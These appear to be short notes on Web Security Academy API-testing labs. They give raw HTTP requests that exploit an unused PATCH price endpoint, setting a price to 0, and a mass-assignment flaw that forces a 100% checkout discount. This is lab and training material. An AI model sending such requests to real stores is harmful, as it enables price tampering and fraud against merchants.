API Testing
Finding and exploiting an unused API endpoint
The price
endpont not only allows the GET
methode but also PATCH
PATCH /api/products/1/price HTTP/2
Host: 0ad10068036333308060530f007800d6.web-security-academy.net
Cookie: session=f1t8Tfqc7LY7RwwMuWYwYG5mA2CxkpFc
[...]
Content-Type: application/json;charset=UTF-8
Content-Length: 12
{"price": 0}
Exploiting a mass assignment vulnerability
It is possible to send a POST
request to the checkout
endpoint with 100%
discount.
POST /api/checkout HTTP/2
Host: 0af0002804d0d47e86ff4f3200e200aa.web-security-academy.net
Cookie: session=42Y5LbakIMHg3C8i7egh1Kt9P1E6UWD9
Content-Type: application/json;charset=UTF-8
[...]
{"chosen_discount":{"percentage": 100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]}